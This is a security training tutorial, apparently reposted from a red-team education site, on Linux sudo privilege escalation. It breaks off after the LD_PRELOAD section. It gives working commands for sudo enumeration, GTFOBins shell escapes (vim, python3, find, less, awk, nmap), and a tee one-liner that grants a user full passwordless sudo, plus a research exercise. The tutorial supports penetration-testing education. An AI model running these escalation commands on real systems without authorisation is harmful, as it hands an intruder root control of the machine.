π° Originally published on Securityelites β AI Red Team Education β the canonical, fully-updated version of this article.
I find a sudo misconfiguration on at least half of the Linux systems I assess. Not because organisations are careless β most have intentional sudo rules for legitimate operational reasons. The problem is that those rules were written by someone who understood the intended use case but didnβt know about GTFOBins. Every sudo rule that lets a user run a binary capable of spawning a shell, reading arbitrary files, or writing to privileged paths is a potential privilege escalation path. Here are the seven methods I use in practice, in order of how often I find them.
What Youβll Learn
Enumerate sudo permissions with sudo -l and understand the output
Exploit NOPASSWD sudo rules via GTFOBins techniques
Abuse LD_PRELOAD and env_keep for privilege escalation
Exploit wildcard injection in sudo rules
Check for vulnerable sudo versions (CVE-2021-3156 Sudo Baron Samedit)
β±οΈ 30 min read Β· 3 exercises ### 7 Linux Sudo Privilege Escalation Methods β Table of Content 1. Enumeration β sudo -l and /etc/sudoers 2. NOPASSWD β Shell Escape via GTFOBins 3. LD_PRELOAD β Environment Variable Abuse 4. sudo Version Exploits β Baron Samedit 5. Wildcard Injection in sudo Rules 6. env_keep β Inherited Variable Abuse 7. Restricted Shell Bypass via Allowed Binaries Sudo privilege escalation is one of the first checks I run on every internal Linux assessment β right after confirming I have a shell. It is one of the core paths in the Privilege Escalation methodology. After youβve run port scanning to confirm the service footprint, sudo enumeration is the first check I run after landing a low-privilege shell. My rule: sudo -l before anything else, every single time, without exception.
1. Enumeration β sudo -l and /etc/sudoers
Every privilege escalation attempt starts with enumeration. sudo -l lists what the current user can run with sudo β no password required for this check in most configurations. The output tells you everything about the attack surface before you need to research anything on GTFOBins.
SUDO ENUMERATION COMMANDSCopy
Most important command on initial shell
sudo -l
Sample output:
User www-data may run the following commands on target:
(root) NOPASSWD: /usr/bin/vim
(root) NOPASSWD: /usr/bin/python3 /opt/scripts/backup.py
(ALL : ALL) ALL
Read /etc/sudoers if permissions allow (rare)
cat /etc/sudoers 2>/dev/null
cat /etc/sudoers.d/* 2>/dev/null
Interpreting the output
(root) NOPASSWD: /bin/vim β run vim as root, no password = GTFOBins target
(ALL) ALL β run ANYTHING as root = game over
(root) /usr/bin/python3 *.py β wildcard = injection possible
(root) /usr/bin/find β GTFOBins: find -exec /bin/sh \;
2. NOPASSWD β Shell Escape via GTFOBins
GTFOBins (gtfobins.github.io) catalogs shell escape techniques for hundreds of Linux binaries. When sudo -l shows a binary with NOPASSWD, I check GTFOBins for that binary immediately. Common binaries allowed in sudo rules that have trivial shell escape techniques: vim, nano, less, man, find, python, perl, ruby, awk, nmap, tee, cp.
NOPASSWD GTFOBins β TOP TECHNIQUESCopy
vim β escape to shell from vim
sudo vim -c β:!/bin/bashβ
OR from inside vim:
:set shell=/bin/bash
:shell
python3 β one-liner to root shell
sudo python3 -c βimport pty; pty.spawn(β/bin/bashβ)β
find β exec shell via find
sudo find / -name β*.confβ -exec /bin/bash \; -quit
less / man β shell from pager
sudo less /etc/passwd
Then type: !/bin/bash
awk
sudo awk βBEGIN {system(β/bin/bashβ)}β
tee β write to privileged files
echo βwww-data ALL=(ALL) NOPASSWD:ALLβ | sudo tee -a /etc/sudoers
nmap (older versions with βinteractive)
sudo nmap βinteractive
nmap> !sh
EXERCISE 1 β BROWSER (15 MIN)
GTFOBins Research β Map 10 Binaries to Their Sudo Escape
Browser only Β· gtfobins.github.io
Visit gtfobins.github.io and find the sudo escalation technique for each:
- tar 2. zip 3. perl 4. ruby 5. node (Node.js) 6. curl 7. wget 8. bash 9. env 10. git
For each binary record: β The exact sudo command that gives a root shell β Whether it requires any file to exist or parameter
Which 3 of these 10 would you most expect to find in a real sudo rule? (Think: what legitimate admin task would require this binary with sudo?)
Bonus: search for βcpβ and βmvβ β why are these dangerous in sudo rules?
β The three most common in real environments (based on my assessments): python/python3 (admins grant it for script management), find (for file search operations with elevated permissions), and less/more/man (for viewing log files without granting full read access). The βcpβ and βmvβ danger: with sudo cp, you can overwrite /etc/sudoers or /etc/passwd with a version you control β no shell escape needed, just a privilege-escalating file copy.
πΈ Share your mapped table in #privilege-escalation on Discord.
3. LD_PRELOAD β Environment Variable Abuse
When sudo is configured with env_keep+=LD_PRELOAD, the LD_PRELOAD environment variable is preserved when running sudo commands. LD_PRELOAD forces a shared library to load before any other β including libc. If that library is attacker-controlled, any sudo invocation loads and executes the malicious library code as root.
π Read the complete guide on Securityelites β AI Red Team Education
This article continues with deeper technical detail, screenshots, code samples, and an interactive lab walk-through. Read the full article on Securityelites β AI Red Team Education β
This article was originally written and published by the Securityelites β AI Red Team Education team. For more cybersecurity tutorials, ethical hacking guides, and CTF walk-throughs, visit Securityelites β AI Red Team Education.
Top comments (0)